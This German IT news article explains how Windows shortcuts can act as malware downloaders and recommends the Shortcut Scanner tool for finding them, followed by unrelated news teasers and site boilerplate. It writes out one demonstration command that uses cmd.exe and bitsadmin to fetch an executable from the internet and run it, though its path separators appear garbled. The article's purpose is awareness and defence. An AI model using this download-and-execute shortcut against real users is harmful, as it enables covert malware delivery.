Eine Verknüpfung unter Windows kann problemlos einen Virus aus dem Internet laden und starten. So verhindern Sie das. [...]
Das Tool Shurtcut Scanner zeigt Ihnen alle in Windows hinterlegten Verknüpfungen (Shortcuts) an. Das ist zum Beispiel dann sinnvoll, wenn Sie Ihren Rechner auf gefährliche Shortcuts überprüfen wollen. Darauf weist der Hersteller des Tools hin. Was zunächst etwas merkwürdig klingt („gefährliche Shortcuts“), ist aber ein durchaus berechtigter Hinweis. Denn der Angriff mit Schadcode auf einen PC läuft sehr oft in zwei Schritten ab.
Zunächst versuchen die Virenverbreiter, einen sogenannten Downloader auf den PC zu platzieren. Das ist ein kleines Programm, das nichts anders macht, als den eigentlichen Virus auf den PC herunterzuladen und zu starten. Der Grund für die Zweiteilung in Download-Code und Virus liegt bei den üblichen Schutzmechanismen. So setzen etwa alle großen Maildienst-Anbieter Virenscanner ein, die den Anhang jeder Mail scannen. Finden Sie dort einen Virus, wird dieser gelöscht. Ein Download-Code dagegen sieht für einen Virenscanner oft harmlos aus. Der Code richtet ja scheinbar nicht viel an. Entsprechend leichter ist es für den Angreifer einen Downloader per Mail zu verteilen.
Verknüpfungen: Auch hinter einer Verknüpfung kann sich ein Download-Code verstecken. Der Code kann sogar komplett aus Bordmitteln von Windows bestehen. So muss ein Angreifer nicht einmal mehr eine EXE- oder DLL-Datei auf den PC schleusen, sondern nur noch den Code, der eine Verknüpfung unter Windows erstellen kann.
Der Hersteller des Tools Shurtcut Scanner, Phrozen Software, gibt ein eindrückliches Beispiel für einen solchen Code, den Sie auch selber ausprobieren können. Klicken Sie mit der rechten Maustaste auf Ihren Desktop und wählen Sie „Neu -> Verknüpfung“. In das folgende Feld geben Sie diesen Befehl ein: Befehl cmd.exe /C „%windir%System32bitsadmin.exe /transfer downloader /priority normalhttps://phrozensoft.com/uploads/2016/09/ Winja_2_6084_65441_setup.exe%temp%setup.exe & %temp%setup.exe“
Ein Klick auf „Weiter“ und „Fertigstellen“ legt die neue Verknüpfung auf den Desktop ab. Nun Bedarf es noch eines kleinen Tricks, den Anwender zum Klick auf die Verknüpfung zu überreden und schon landet Code aus dem Internet auf Ihrem PC und wird gestartet. In diesem Beispiel ist es aber nur das Tool Winja vom Herteller Phrozen Software. Es lädt auf Wunsch Dateien zu einem Online-Virenscanner hoch.
Shortcut Scanner nutzen: Starten Sie das Tool Shortcut Scanner in der für Sie passenden Version, also als 32- oder 64-Bit-Version. Es läuft ohne Installation. Klicken Sie auf das Ordnersymbol und wählen Sie „Full Scan“, um alle Festplatten nach Verknüpfungen durchsuchen zu lassen.
Nach dem Suchlauf listet das Tool alle verdächtigen Verknüpfungen auf und sortiert sie nach ihrer möglichen Gefährlichkeit („Dangerous“, „Suspicous“ und „Broken“). Eine eindeutige Aussage über eine Verknüpfung macht das Tool nicht, sodass Sie sich den Fund noch einmal selber genau prüfen müssen. Möchten Sie eine Verknüpfung beseitigen, dann setzen Sie einen Haken davor und klicken oben auf das Radiergummisymbol. Dort wählen Sie dann die Gefährlichkeitsstufe aus, die Sie bereinigen wollen.
*Arne Arnold arbeitet seit über 15 Jahren bei der PC-WELT als Redakteur in den Bereichen Software und Internet
Der österreichische Online-Handel verzeichnet einen bemerkenswerten Aufschwung: Die digitalen Ausgaben stiegen 2023 auf über 14 Milliarden Euro. Flexible Zahlungsmethoden und innovative Technologien wie „Tap to Pay“ prägen die Einkaufswelt. […]
Über 150 Teilnehmer und Teilnehmernnen aus Wirtschaft, IT und Bildung kamen zum CorporateMeetsStudents Event am Campus 42 Vienna zusammen. Im Mittelpunkt der Diskussionen stand die zentrale Rolle von Software-Kompetenz nicht nur für das Wirtschaftswachstum, sondern auch für die gesamtgesellschaftliche Entwicklung Österreichs. […]
Nutzen Sie die die ruhigen Tage rund um den Jahreswechsel, um Ihre Daten zu ordnen, Platz für Neues zu schaffen und Ihren Arbeitsplatz klarer und nachhaltiger zu gestalten. Iphos IT hat folgende Tipps zusammengestellt, wie das digitale Ausfegen mit den richtigen Tools, Techniken und speziellen Enterprise-Search-Lösungen auf Knopfdruck gelingt. […]
Im Gespräch mit der ITWELT.at verdeutlicht Gregor Schmid, Projektcenterleiter bei Kumavision, wie sehr sich die Anforderungen an ERP-Systeme und die digitale Transformation in den letzten Jahren verändert haben und verweist dabei auf den Trend zu modularen Lösungen, die Bedeutung der Cloud und die Rolle von Künstlicher Intelligenz (KI) in der Unternehmenspraxis. […]
Die „Guidelines for Secure Development and Deployment of AI Systems“ von Kaspersky behandeln zentrale Aspekte der Entwicklung, Bereitstellung und des Betriebs von KI-Systemen, einschließlich Design, bewährter Sicherheitspraktiken und Integration, ohne sich auf die Entwicklung grundlegender Modelle zu fokussieren. […]
Kopfhörer, Lautsprecher und Soundbars sind die drei wichtigsten Audioklassen – alle mit ganz individuellen Besonderheiten. Dieser Audio-Guide zeigt, welches Gerät sich für wen lohnt und was es beim Kauf zu beachten gilt. […]
Cloud Computing bietet unschlagbare Vorteile wie Skalierbarkeit und Flexibilität, bringt jedoch auch Herausforderungen mit sich. Vor allem die Kosteneffizienz in der Cloud wird für Unternehmen immer wichtiger, da die Ausgaben für Cloud-Dienste stetig steigen. […]
Damit KI eine Rolle in der Cyberabwehr spielen kann, ist sie auf leicht zugängliche Echtzeitdaten angewiesen. Das heißt, die zunehmende Leistungsfähigkeit von GenAI kann nur dann wirksam werden, wenn die KI Zugriff auf einwandfreie, validierte, standardisierte und vor allem hochverfügbare Daten in allen Anwendungen und Systemen sowie für alle Nutzer hat. Dies setzt allerdings voraus, dass Unternehmen in der Lage sind, ihre Datensilos aufzulösen. […]
Aktuelle Business IT-News für Österreich. Die ITWELT (vormals: COMPUTERWELT) ist Österreichs führende IT- Zeitung für den gesamten Bereich der Informationstechnik und Telekommunikation. Wir schreiben für leitende IT- Experten (IT-Leiter, CIO) in IT-Branche und EDV-Abteilungen. Unsere Themen: Business Software, Netzwerk, Security, Mobile Kommunikation, Infrastruktur, Cloud, Wirtschaft, IT-Innovation. Zudem finden Sie hier IT-Anbieter, Whitepaper, Webinare, Termine, Social Events und Praxisreports aus der IT und ITK Branche. (c) 2024 - ITW Verlag GmbH
Anmeldung Roundtable
Keine Felder gefunden.
Datenschutz Newsletter
Ich erhalte den Newsletter der Computerwelt c/o CW Fachverlag GmbH, Halbgasse 3-5 in 1070 Wien.
Meine Daten werden sicher gespeichert und niemals an Dritte weitergegeben.
Eine Abmeldung vom Newsletter, sowie Anmeldungen zu weiteren Services ist durch einen Link am Ende des Newsletters möglich.
Sie sehen gerade einen Platzhalterinhalt von Facebook. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von Instagram. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Sie sehen gerade einen Platzhalterinhalt von X. Um auf den eigentlichen Inhalt zuzugreifen, klicken Sie auf die Schaltfläche unten. Bitte beachten Sie, dass dabei Daten an Drittanbieter weitergegeben werden.
Be the first to comment